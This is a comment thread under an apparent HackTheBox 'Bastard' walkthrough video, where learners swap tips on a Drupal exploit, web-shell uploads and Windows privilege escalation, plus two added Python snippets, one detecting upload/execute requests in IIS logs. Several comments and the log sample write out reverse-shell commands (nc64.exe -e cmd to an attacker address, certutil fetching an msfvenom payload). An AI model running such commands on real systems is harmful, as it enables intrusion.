My God Ipp one again you outdone yourself. Once again the greatest info sec vid i ever seen. Thanks a thousand time. so explanatory and clear. IM so gratefull. . Keep it up its so appreciated that u share and teach !
What a master. It's a pleasure to see you speak through your process. Thanks for putting these vids up.
Incredible how much your production has increased over the years. Awesome that you've been making content this long.
I'm studying for my OSCP exam and your work is helping a lot. Thank you. I really mean it. Took me 5 hours to reproduce the steps you went through in this video and I must admit this machine killed me. I definitely have to try harder. Keep up the good work.
Now for my Italian fellows: if anyone wants to form a small study group to exchange experiences, opinions and advice, speak up! Ciao!!
I want to form a group! :D
A bit too late, but here I am
Hi Marco, have you had issues uploading nc64.exe? i've run into the problem only with this part of the video.
Did you pass your exam?
You're a modern wonder man, I'm so happy you make these videos, your insight into operating systems is truly amazing. Keep up the good work xx
=^.^=
Thanks for this video - I learned quite a bit!
Excellent job you are doing bro! Thanks for sharing!
for anyone that gets the weird error from the php script
'apt install curl-php'
Had to do the install on my end 'apt-get install php-curl'
This was of very good help. Thank You.
Thank you. This helped a lot
on newer versions of Kali with PHP 7.2 it's sudo apt-get install php7.2-curl
Very useful, thank you man!
if anyone is having issues with the PHP exploit while using PHP version 7.3.8 update it too 7.4 and reinstall php-curl and it should run without the curl_init error.
"ch ch ch ch ch chhhhhhhh.." last few month live with that sound :)
I used the PHP exploit with the OS shell, downloaded a msfvenom reverse TCP shell.exe with certutil, and then executed a reverse shell - but I'm sure you wanted to show other techniques with Burp and web shells - which I found very useful to learn about!
Great video! Thanks!
Hey man, so what modifications did you do to the php exploit? Did you only modify the rest_endpoint? And how did you know that it should be changed back to ‘rest’?
@@younesmohssen8158 I didn't make any modifications. I just ran the Drupal exploit, uploaded a reverse shell binary (.exe), and then executed it (shell.exe) and generated a reverse shell
TheCryptonian ohhhh okay and how about the endpoint? How did you know it was ‘rest’ and not ‘rest_endpoint’?
@@younesmohssen8158 Did you find an answer bro, how to know it is rest, or something else when it comes up next time
searchsploit -m 4449 --> shell
Thank you very much sir.
As always, A-MAY-ZING! Thanks!
Thank you IppSec for such an in depth video!
I am stuck on only one part in the video... I had no issues with any of the other script uploads or techniques, but for some reason I am not able to upload nc64.exe to the target:
I've tried the following:
1. Kali:/path/where/nc64exe/is/directory: #python -m SimpleHTTPServer 8000
2. kali:/second/terminal/window:#nc -lvnp 8081
3. Kali:10.10.10.9/cybersec.php?fupload=nc64.exe&fexec=nc64.exe -e cmd 10.10.x.x 8081
am I missing anything?
You've forgotten to enclose the arguments to nc64 in quotes; as ipp explains, this is so that nc64 takes those in as one argument
Hi, I know this is a bit of an old comment, but did you solve this issue? I'm stuck on the exact same place and even trying to do similar things from other guides it always fails at this stage where I try to upload a file, it's like something is blocking upload attempts.
@@bigbmxdave Sorry Oguzhan, I can't remember exactly :) I'd have to go back in time, or redo this box again to validate. Will let you know
29:55 How can you enter the path of the nc64.exe like that and it still works? How does the php file know the location of the executable on your disk?
Current working directory is in the path by default.
@@ippsec I was asking about how you could upload nc64.exe from your machine to the victim by just entering the file name in the URL, but reviewing the code at 15:39 shows that you actually coded the shell to download files from the Python HTTP server on your machine, that's why you can just enter nc64.exe and it will be uploaded. 😅 Thanks bro, keep up the great work
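The upload/execute pattern discussed in this thread (a `fupload=` parameter naming a file to fetch and a `fexec=` parameter carrying a command line, which has to be quoted so the whole command reaches the binary as one argument) leaves a very recognisable trace in the web server's access log. The following is an added example, not code from the video or from any commenter, that parses IIS W3C-format log lines and flags such requests. The log lines, the `cybersec.php` stem and the client address `10.10.14.2` are constructed for the example; `fupload`/`fexec` are the parameter names used in the comment above.

```python
"""Added example: flag upload/execute style requests in IIS W3C access logs.

The parameter names `fupload` and `fexec` come from the thread above; the
log lines, hostnames and addresses below are constructed sample data.
"""
from urllib.parse import parse_qs

# Constructed IIS W3C log excerpt (fields header plus four requests).
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query sc-status
2017-03-19 10:01:02 10.10.10.9 GET /index.php - 200
2017-03-19 10:01:05 10.10.10.9 GET /cybersec.php fupload=nc64.exe&fexec=nc64.exe+-e+cmd+10.10.14.2+8081 200
2017-03-19 10:01:09 10.10.10.9 GET /cybersec.php fupload=nc64.exe&fexec=%22nc64.exe+-e+cmd+10.10.14.2+8081%22 200
2017-03-19 10:02:00 10.10.10.9 GET /rest/user/login - 200
"""

# Query parameters that indicate a file-drop / command-execution helper.
SUSPICIOUS_PARAMS = {"fupload", "fexec"}


def parse_w3c(text):
    """Yield one dict per request line, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line.strip() or line.startswith("#") or fields is None:
            continue
        yield dict(zip(fields, line.split()))


def flag_requests(text):
    """Return a list of findings for requests whose query string carries
    any of SUSPICIOUS_PARAMS. For `fexec` we also record whether the value
    was quoted as a single argument and whether it asks for a shell (-e)."""
    findings = []
    for rec in parse_w3c(text):
        query = rec.get("cs-uri-query", "-")
        if query == "-":
            continue
        # parse_qs decodes '+' to space and %22 to a double quote.
        params = parse_qs(query, keep_blank_values=True)
        matched = SUSPICIOUS_PARAMS & set(params)
        if not matched:
            continue
        fexec = params.get("fexec", [""])[0]
        findings.append({
            "time": f"{rec['date']} {rec['time']}",
            "uri": rec["cs-uri-stem"],
            "params": sorted(matched),
            "fexec": fexec,
            "quoted": fexec.startswith('"') and fexec.endswith('"'),
            "spawns_shell": "-e" in fexec.strip('"').split(),
        })
    return findings


if __name__ == "__main__":
    for f in flag_requests(SAMPLE_LOG):
        print(f)
```

Both the unquoted and the quoted variant from the thread are caught; the `quoted` field shows which form the client sent, and `spawns_shell` isolates the `-e` case that hands a command interpreter to a remote socket. On a real server the same function can be fed the daily `u_ex*.log` file instead of the constructed sample.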
There's actually a simpler way to privesc on this box, if you do whoami /all you will see you have SeImpersonatePrivilege enabled which would allow you to execute Juicy potato, takes like 5 minutes.
This machine came out before that was a thing 😀
@@ippsec I did think that might be the case, great videos by the way! :)
i kept getting access denied whenever I tried running juicyp
ahahha this is exactly what I did, along with drupalgeddon which I also believe is newer, done the box in ~ 30 mins
Great Walkthrough!
This one is kinda difficult in my case. If I don't have your tutorial, that exploit is not working for me.
I wonder what level of difficulty is this machine? If it is just average box, I think I am far away from a pen tester now.
I have the same feeling. Since this comment was posted 5 years ago, how're you doing right now?
thanks man !! that was pain for me to crack it alone !
just freaking awesome
any idea why I am seeing "no socket" when I go to 10.10.10.9? No image, nothing, just "no socket" written. :/
@IppSec I am just wondering did you fix the exploit before you started recording? When I ran the exploit I had to fix the "curl_init()" function.
For everyone interested ... do an 'apt-get install php-curl' to install the required library.
@@Sokow thank you!!
@@Sokow holy wow thank you so much
i only managed user. Thanks for this
The great course
i want to know which keyboard are you using?!
Awesome video. Thx a lot - KNX
I get this error when executing the code, everything is right...
PHP Fatal error: Uncaught Error: Call to undefined function curl_init() in /drupal.php:265
Stack trace:
#0 /drupal.php(115): Browser->post('application/vnd...', 'a:2:{s:8:"usern...')
#1 {main}
thrown in /drupal.php on line 265
I literally solved it 2 minutes after typing this comment, a quick google taught me to download this
sudo apt-get install php-curl
worked right after!
hello dear, I would like to know why in the PowerUp.ps1 file you add Invoke-AllChecks at the end of the file
He wants to execute this module/function, so when he added this at the end of the script, the script executes this function automatically. IDK if it is clear, but look at how PowerSploit/PowerUp normally work in PowerShell and you will understand. Hope it makes sense lol
Hi, just a question, why we need to type: “ | powershell -noprofile - “ ?
The first command downloads the contents of the file as a string. So by using a pipe you are sending that string as input to powershell for it to interpret; the "-" represents that. So to write it another way would be "powershell -noprofile 'downloadedString'". The noprofile flag says don't load any pre-defined user commands (similar to excluding ~/.bashrc on Linux).
I get a random error on line 24 but I didn't even touch that code
php 41564.php
PHP Parse error: syntax error, unexpected 'error_reporting' (T_STRING) in /root/Documents/htb/boxes/Bastard/41564.php on line 24
and line 24 is
error_reporting(E_ALL);
check the comments above error_reporting in the code and comment out the line which is without #
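The parse error quoted above comes from a header line in the downloaded exploit file that is not a comment, so PHP tries to parse it as code and chokes on the first real statement. The following is an added example, not part of the video or of the 41564.php script, that finds such lines between the opening `<?php` tag and the first statement and comments them out. The sample file content is constructed to resemble that header; the `Note:` line in it is the kind of stray text the reply above refers to.

```python
"""Added example: spot and comment out stray header lines in a PHP script.

The sample below is constructed; it imitates an exploit-db style header in
which one descriptive line is missing its leading '#'.
"""

SAMPLE_BROKEN = """<?php
# Exploit Title: Drupal 7.x Services Module Unserialize() RCE
# Date: 2017-03-15
Note: run with php-curl installed
/* multi-line
   block comment */
# Tested on: Drupal 7.54
error_reporting(E_ALL);
"""


def find_stray_header_lines(source):
    """Return (line_number, text) for lines between '<?php' and the first
    statement (a line ending in ';') that PHP would not treat as a comment.
    Handles '#', '//' and '/* ... */' comments."""
    stray = []
    in_block = False
    for n, line in enumerate(source.splitlines(), 1):
        s = line.strip()
        if in_block:
            if "*/" in s:
                in_block = False
            continue
        if not s or s == "<?php" or s.startswith(("#", "//")):
            continue
        if s.startswith("/*"):
            in_block = "*/" not in s
            continue
        if s.endswith(";"):
            break  # first real statement reached; header is over
        stray.append((n, s))
    return stray


def comment_out_stray_lines(source):
    """Return the source with every stray header line prefixed by '# '."""
    to_fix = {n for n, _ in find_stray_header_lines(source)}
    lines = source.splitlines(keepends=True)
    return "".join(
        ("# " + line) if n in to_fix else line
        for n, line in enumerate(lines, 1)
    )


if __name__ == "__main__":
    for n, text in find_stray_header_lines(SAMPLE_BROKEN):
        print(f"line {n}: {text}")
    print(comment_out_stray_lines(SAMPLE_BROKEN))
```

Run it against the downloaded script (`python3 check_header.py < 41564.php` after reading `sys.stdin` instead of the constructed sample) before invoking `php`, and the "unexpected 'error_reporting'" message points at the fixed-up file no longer.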
Awesome thank you,
any particular reason you don't use your shell for uploading PowerUp?
And thank you for your channel, you are AWESOME man, i hope i can have the half of your skill and i will be happy :D
Just mixing up techniques between videos. I try to rotate TTPs between boxes to show different ways to do things.
Ok thanks and please continue videos i learn a lot of tricks with you!!! You are in my PC with notes ippsec_TIPS_&_TRICKS ahaha
Get 500 - Internal server error when checking to see once the ippsec.php file is written via the drupal.php script.
I love you.
excellent video :) well explained, I got stuck on this machine and after vacation it seems like it has been retired.... :) I was able to find the endpoint but could not get the admin user created through the ambionics script..... Could you shed light on why you used 127.0.0.1 instead of the IP address of Bas____ please....
Watch the Arctic video, I explain it there as well. Essentially just an easy hack to get the request into Burp without code changes
Well you could have used powershell for file upload (no need for php uploader). Great video though, explaining other angles :) Also filed issue here github.com/rasta-mouse/Sherlock/issues/5
Yeah, there's a lot I want to do with Powershell but this is only Version 2. So probably wait for a future box to do more powershell stuff.
Hi! Was MS15-051 actually verified on this box, or was it just speculation that Sherlock is giving a false result?
It's verified in this video :) I used MS15-051, download it at 32m
Heh - wasn't paying close attention. Will pick this up on Twitter :)
would you make another videos for windows machines ?
I am not able to privesc on this machine... EXEs are not running... tried nc64.exe... not working... used nishang to get a PowerShell reverse shell... in that also no exe is running... I tried both the 64- and 32-bit version of it...
PS C:\inetpub\drupal-7.54> Invoke-PowerShellTcp : Program 'ssec.exe' failed to execute: This version of %1 is not compatible with the version of Windows you're running. Check your computer's system information to see whether you need a x86 (32-bit) or x64 (64-bit) version of the program, and then contact the software publisher
Any help is appreciated
thanks
What did you do?
why are all these Windows servers using a Greek locale? Are Greeks making these kinds of boxes?
Hey what's up @ipsec
@ippsec